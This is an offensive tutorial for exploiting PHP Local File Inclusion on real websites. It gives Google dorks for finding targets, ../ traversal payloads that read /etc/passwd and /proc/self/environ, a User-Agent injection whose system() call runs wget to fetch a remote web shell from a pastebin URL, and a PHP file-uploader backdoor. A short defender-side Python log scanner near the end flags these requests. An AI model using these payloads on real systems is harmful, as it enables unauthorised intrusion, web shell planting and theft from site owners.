Exploit Local File Inclusion Vulnerability


Hello Exploiter!! This time I will share an LFI exploit tutorial. Honestly this exploit is very old; you could say it is a basic one for you pentesters, on par with SQL injection.

Google Dorks:

  • inurl:/view/lang/index.php?page=?page=
  • inurl:/shared/help.php?page=

I'll assume you already have a target, so let's go straight to the basic test of whether the site is vulnerable to LFI.

  • target.com/view.php?page=email.php

Try replacing email.php with ../../

  • target.com/view.php?page=../../

If you get an error like

Warning: include(../../) [function.include]: failed to open stream: No such file or directory in /home/hackers/public_html/view.php on line 1337

there is a chance to read more sensitive local files.
Let's try calling /etc/passwd.

  • localhost/view.php?page=etc/passwd

Still an error?

Warning: include(etc/passwd) [function.include]: failed to open stream: No such file or directory in /home/hackers/public_html/view.php on line 1337

Let's go up a directory level.

  • localhost/view.php?page=../../../../../etc/passwd

If it still errors, keep going up directories until /etc/passwd is read.

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin

... etc. :p

Now let's check whether proc/self/environ can be accessed or not, because this is where the backdoor injection process begins.

  • localhost/view.php?page=../../../../../proc/self/environ

DOCUMENT_ROOT=/home/hackers/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html,
application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif,
image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=3g4t13371b341231b94r1844ac2ad7ac
HTTP_HOST=localhost HTTP_REFERER=http://localhost/view.php?page=../../../../../etc/passwd
HTTP_USER_AGENT=Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2015102815 Ubuntu/9.04 (trusty) Firefox/5.0.15
PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
REDIRECT_STATUS=200 REMOTE_ADDR=127.0.0.1 REMOTE_PORT=1337
REQUEST_METHOD= GET REQUEST_URI = /view.php?page=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
SCRIPT_FILENAME=/home/hackers/public_html/view.php SCRIPT_NAME=/view.php
SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=hackers@site.com SERVER_NAME=localhost
SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k
PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0 Server at localhost Port 80

That means the site can be injected. If it comes back blank, it can't.
Next step: enable Tamper Data.
Load the page localhost/view.php?page=../../../../../proc/self/environ
Then tamper it.
In the User-Agent field of the Tamper Data add-on, enter

<?system(‘wget https://pastebin.com/raw/YNpriSQu -O exploit.php’);?>

Then submit.

Your shell will be located at

  • target.com/exploit.php

In some cases the system function is disabled on the server, so we can't run wget using the method above.
But there is another way.
In the User-Agent, insert the following uploader script:

<?php @copy($_FILES['file']['tmp_name'],$_FILES['file']['name']); ?><p>
<h1> shu </h1></p>
<br> <form action="" method="post" enctype="multipart/form-data">
Filename: <input type="file" name="file" /><input type="submit" value="Submit" /><br>

Once uploaded, the shell will be located at the domain's root path.
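As an added defender-side example (not code from the original post), here is a small Python scanner that reads Apache combined-format log lines and flags the request pattern this tutorial walks through: ../ traversal (including the %2F-encoded form visible in the environ dump above), reads of /etc/passwd or /proc/self/environ, and a PHP open tag planted in the User-Agent. The log lines, IP address and file names are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in Apache "combined" format (not taken from the original post).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:37:00 +0000] "GET /view.php?page=email.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:37:01 +0000] "GET /view.php?page=../../../../../etc/passwd HTTP/1.1" 200 1337 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:37:02 +0000] "GET /view.php?page=..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron HTTP/1.1" 200 2048 "-" "<?php echo 'probe'; ?>"
203.0.113.5 - - [10/Oct/2023:13:37:03 +0000] "GET /view.php?page=about.php HTTP/1.1" 200 400 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Files the post shows being read through the vulnerable include().
SENSITIVE = ("/etc/passwd", "/proc/self/environ")


def decode(value, rounds=2):
    # Decode repeatedly so ..%2F and double-encoded ..%252F both normalise to ../
    for _ in range(rounds):
        value = unquote(value)
    return value


def classify(url, ua):
    """Return the reasons a request looks like an LFI attempt (empty list if clean)."""
    reasons = []
    path = decode(url).replace("\\", "/")
    if "../" in path:
        reasons.append("traversal")
    for target in SENSITIVE:
        if target.lstrip("/") in path:  # matches etc/passwd and ../etc/passwd alike
            reasons.append("sensitive-file:" + target)
    if "<?" in decode(ua):  # PHP tag in User-Agent: environ/log poisoning attempt
        reasons.append("php-tag-in-user-agent")
    return reasons


def analyze(log_text):
    """Parse combined log lines and return one finding per suspicious request."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and (reasons := classify(m["url"], m["ua"])):
            findings.append({"ip": m["ip"], "url": m["url"],
                             "status": int(m["status"]), "reasons": reasons})
    return findings
```

A 200 status on a flagged request is the case worth paging on, since the tutorial shows that the include only returns content when the traversal succeeds.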





Reference: https://exploit.linuxsec.org/

If you're still confused, here is the video:





